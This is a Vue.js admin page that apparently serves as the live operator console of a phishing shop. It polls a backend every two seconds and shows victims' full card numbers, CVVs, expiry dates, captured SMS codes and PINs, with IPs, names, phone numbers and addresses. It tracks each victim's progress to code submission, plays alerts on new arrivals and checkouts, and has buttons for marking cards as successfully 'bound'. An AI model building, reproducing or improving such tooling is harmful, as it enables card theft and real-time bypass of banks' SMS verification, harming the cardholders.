<template>
  <div class="app-container">
    <div
      class="filter-container"
      style="justify-content: space-between;border-bottom: 1px dashed #E0E0E0;margin-bottom: 20px;"
    >
      <div>
        <div class="filter-item" style="margin-right: 30px;">
          <span style="margin-right: 10px">开启提示音</span>
          <el-switch
            v-model="isPromptTone"
            active-color="#13ce66"
            inactive-color="#CCCCCC"
          >
          </el-switch>
        </div>
        <el-button
          class="filter-item"
          type="primary"
          icon="el-icon-microphone"
          @click="openAudio(true, 'logo')"
          >测试声音</el-button
        >
        <el-button
          class="filter-item"
          icon="el-icon-refresh"
          @click="handleFilter"
          >刷新</el-button
        >
      </div>
      <div style="display: flex;align-items: center;width: 40%">
        <el-select
          v-model="listQuery.status"
          placeholder="状态"
          style="width: 220px"
          class="filter-item"
          clearable
          @change="getList"
        >
          <el-option
            v-for="item in BANK_CARD_STATUS"
            :key="item.key"
            :label="item.value"
            :value="item.key"
          />
        </el-select>
        <div style="margin-left: 30px;">总订单数：{{ total }}</div>
      </div>
    </div>

    <el-table
      v-loading="listLoading"
      :data="list"
      element-loading-text="Loading"
      size="small"
      border
      fit
      highlight-current-row
    >
      <el-table-column
        align="center"
        prop="id"
        label="ID"
        width="95"
      ></el-table-column>

      <el-table-column label="在线状态" align="center" prop="online">
        <template slot-scope="scope">
          <span>
            <el-tag
              :type="scope.row.online === 0 ? 'danger' : 'success'"
              effect="dark"
            >
              {{ getValue(ONLINE_STATUS, scope.row.online) }}
            </el-tag>
          </span>
        </template>
      </el-table-column>
      <el-table-column label="状态" align="center" prop="status" width="120">
        <template slot-scope="scope">
          <span>{{ getValue(BANK_CARD_STATUS, scope.row.status) }}</span>
        </template>
      </el-table-column>
      <el-table-column label="卡片信息" align="center" width="320">
        <template slot-scope="scope">
          <div class="card-tel-warp">
            <img
              src="@/assets/card_tel.png"
              style="width: 300px;height: 200px;"
            />
            <div class="card-data-warp">
              <div class="_cvv-warp" v-if="scope.row.cvv">
                {{ scope.row.cvv }}
              </div>
              <div class="_cvv-warp" v-else>&nbsp;</div>
              <div class="_bankNo-warp" v-if="scope.row.bankNo">
                {{ processingBankNumber(scope.row.bankNo) }}
              </div>
              <div class="_bankNo-warp" v-else>&nbsp;</div>
              <div class="_expireDate-warp">
                <div style="line-height: 10px;font-size: 8px;">
                  <div>Valid</div>
                  <div>Thru</div>
                </div>
                <div style="margin-left: 6px;">{{ scope.row.expireDate }}</div>
              </div>
            </div>
            <div class="card-tel-no-warp" v-if="!scope.row.bankStatus">
              卡号无效
            </div>
          </div>

        </template>
      </el-table-column>
      <el-table-column label="验证码&PIN" align="center">
        <el-table-column prop="smsCode" label="验证码" align="center">
        </el-table-column>
        <el-table-column
          prop="takeCodeTime"
          label="获取验证码时间"
          align="center"
          width="140"
        >
          <template slot-scope="scope">
            <span>{{ formatApiDate(scope.row.takeCodeTime) }}</span>
          </template>
        </el-table-column>
        <el-table-column prop="pin" label="PIN" align="center">
        </el-table-column>
      </el-table-column>
      <el-table-column
        align="center"
        prop="ctdate"
        label="当前进度"
        width="700"
      >
        <template slot-scope="scope">
          <el-steps :active="scope.row.currentStep" align-center>
            <el-step title="在线"></el-step>
            <el-step title="商品浏览中"></el-step>
            <el-step title="添加购物车"></el-step>
            <el-step title="结算"></el-step>
            <el-step title="支付信息填写"></el-step>
            <el-step title="获取验证码"></el-step>
            <el-step title="完成"></el-step>
          </el-steps>
        </template>
      </el-table-column>
      <el-table-column
        label="用户信息"
        align="left"
        prop="userId"
        width="200"
      >
        <template slot-scope="scope">
          <div>用户编号：{{ scope.row.userId }}</div>
        </template>
      </el-table-column>
      <el-table-column label="IP信息" align="left" prop="ipAddr" width="140">
        <template slot-scope="scope">
          <div>IP：{{ scope.row.ipAddr }}</div>
          <div>IP所属地区：{{ scope.row.ipRegion }}</div>
        </template>
      </el-table-column>
      <el-table-column label="订单信息" align="left" prop="order" width="200">
        <template slot-scope="scope">
          <div>订单编号：{{ scope.row.orderNo }}</div>
          <div>订单金额：${{ scope.row.orderAmount || 0 }}</div>
          <div>联系人：{{ scope.row.name }}</div>
          <div>手机号码：{{ scope.row.mobile }}</div>
          <div>
            订单收货地址：{{ scope.row.orderAddress }}
          </div>
          <div>备注：{{ scope.row.remarks }}</div>
        </template>
      </el-table-column>
      <el-table-column
        align="center"
        prop="ctdate"
        label="创建时间"
        width="160px"
      >
        <template slot-scope="scope">
          <i class="el-icon-time" />
          <span>{{ formatApiDate(scope.row.ctdate) }}</span>
        </template>
      </el-table-column>
      <el-table-column
        label="操作"
        align="center"
        width="260"
        class-name="small-padding fixed-width"
      >
        <template slot-scope="scope" v-if="scope.row.status === 0">
          <div>
            <el-button
              type="success"
              size="mini"
              @click="updateStatus(scope.row, 2)"
              >已绑定</el-button
            >
            <el-button
              type="danger"
              size="mini"
              @click="updateStatus(scope.row, 3)"
              >验证码无效</el-button
            >
          </div>
          <div style="margin-top: 10px">
            <el-button
              type="danger"
              size="mini"
              @click="updateStatus(scope.row, 4)"
              >银行卡不支持</el-button
            >
            <el-button
              type="danger"
              size="mini"
              @click="updateStatus(scope.row, 5)"
              >银行卡信息错误</el-button
            >
          </div>
        </template>
      </el-table-column>
    </el-table>

    <div class="pagination-container">
      <el-pagination
        :current-page="listQuery.page"
        :page-sizes="[10, 20, 30, 50, 100]"
        :page-size="listQuery.pageSize"
        :total="total"
        background
        layout="total, sizes, prev, pager, next, jumper"
        @size-change="handleSizeChange"
        @current-change="handleCurrentChange"
      />
    </div>
    <!--    登录通知-->
    <audio
      ref="audioPlayer"
      src="../../assets/mp3/note.mp3"
      controls
      v-show="false"
    ></audio>
    <!--    结算通知-->
    <audio
      ref="settlementPlayer"
      src="../../assets/mp3/note_settlement.mp3"
      controls
      v-show="false"
    ></audio>
  </div>
</template>

<script>
import { getBankcardList, bindBankcardResult } from "@/api/user";
import { formatApiDate } from "@/utils/utils";
import { processingBankNumber } from "@/utils/index";
import {
  DIALOG_TITLE_TYPE,
  getValue,
  UPLOAD_IMG_TYPE,
  BANK_CARD_STATUS,
  ONLINE_STATUS
} from "@/utils/enumUtile";

export default {
  computed: {
    formatApiDate() {
      return formatApiDate;
    },
    DIALOG_TITLE_TYPE() {
      return DIALOG_TITLE_TYPE;
    },
    UPLOAD_IMG_TYPE() {
      return UPLOAD_IMG_TYPE;
    },
    BANK_CARD_STATUS() {
      return BANK_CARD_STATUS;
    },
    ONLINE_STATUS() {
      return ONLINE_STATUS;
    }
  },
  components: {},
  filters: {},
  data() {
    return {
      list: [],
      total: 0,
      listLoading: false,
      listQuery: {
        page: 1,
        pageSize: 20,
        status: 0
      },
      isPromptTone: true, // 开启提示音
      timer: null // 定时器
    };
  },
  created() {
    this.getList();
  },
  watch: {},
  mounted() {
    this.timer = setInterval(() => {
      this.getList();
    }, 2000); // 1000毫秒后执行一次
  },
  methods: {
    getValue,
    processingBankNumber,
    handleFilter() {
      this.listQuery.page = 1;
      this.getList();
    },
    handleSizeChange(val) {
      this.listQuery.pageSize = val;
      this.getList();
    },
    handleCurrentChange(val) {
      this.listQuery.page = val;
      this.getList();
    },
    /**
     * 查询用户列表
     */
    getList() {
      // this.listLoading = true;
      const form = this.listQuery;
      const params = {
        ...form
      };
      getBankcardList(params)
        .then(response => {
          if (response && response.bizcode === 100) {
            const data = response.data.entitys || [];
            const newList = this.list || [];
            if (data && data.length > 0) {
              if (newList && newList.length !== 0 && data && data.length > 0) {
                // 有新用户进来
                if (data[0].id !== newList[0].id) {
                  this.openAudio(false, "logo");
                }
                const currentStep = this.stepResult(data[0]);
                // 结算的订单
                if(currentStep === 4){
                  this.openAudio(false, "settlement");
                }
              }
            }
            this.processingStep(data);
            this.total = response.data.totalCount;
          }
        })
        .finally(() => {
          // this.listLoading = false;
        });
    },
    processingStep(data = []) {
      const currentData = [];
      data.map(item => {
        currentData.push({
          ...item,
          currentStep: this.stepResult(item)
        });
      });
      this.list = currentData;
    },
    stepResult(item) {
      let result = 0;
      if (item.online === 1 && item.browgoods === 0) {
        result = 1;
      } else if (item.browgoods === 1 && item.addcart === 0) {
        result = 2;
      } else if (item.addcart === 1 && item.settle === 0) {
        result = 3;
      } else if (item.settle === 1 && item.payinfo === 0) {
        result = 4;
      } else if (item.payinfo === 1 && item.takecode === 0) {
        result = 5;
      } else if (item.takecode === 1 && item.submitcode === 0) {
        result = 6;
      } else if (item.submitcode === 1) {
        result = 7;
      }
      return result;
    },
    /**
     * 修改订单状态
     * @param status
     * @param item
     */
    updateStatus(item, status) {
      const params = {
        id: item.id,
        status: status
      };
      bindBankcardResult(params).then(resp => {
        if (resp && resp.bizcode === 100) {
          this.getList();
          this.$notify({
            title: "成功",
            message: "修改成功",
            type: "success",
            duration: 2000
          });
        }
      });
    },

    /**
     * 开声音
     */
    openAudio(status, type) {
      const isPromptTone = this.isPromptTone;
      //
      if (status || isPromptTone) {
        if (type === "logo") {
          this.$refs.settlementPlayer.pause();
          this.$refs.settlementPlayer.currentTime = 0;
          this.$refs.audioPlayer.play();
        } else if (type === "settlement") {
          this.$refs.audioPlayer.pause();
          this.$refs.audioPlayer.currentTime = 0;
          this.$refs.settlementPlayer.play();
        }
      }
    }
  },
  beforeDestroy() {
    if (this.timer) {
      clearInterval(this.timer);
    }
  }
};
</script>
<style scoped lang="scss">
.box-card {
  margin-bottom: 10px;
}
.card-tel-warp {
  position: relative;
  color: #ffffff;
  .card-data-warp {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    ._cvv-warp {
      margin: 80px 0 0 196px;
      text-align: left;
      transform: skewX(10deg);
    }
    ._bankNo-warp {
      margin-top: 12px;
      font-size: 18px;
    }
    ._expireDate-warp {
      margin-left: 196px;
      font-size: 10px;
      text-align: left;
      display: flex;
      margin-top: 6px;
    }
  }
  .card-tel-no-warp{
    position: absolute;
    top: 0;
    left: 0;
    padding: 2px 20px;
    background-color: #bdbdbd7d;
    border-radius: 12px 0;
    color: #ffffff91;
  }
}
</style>
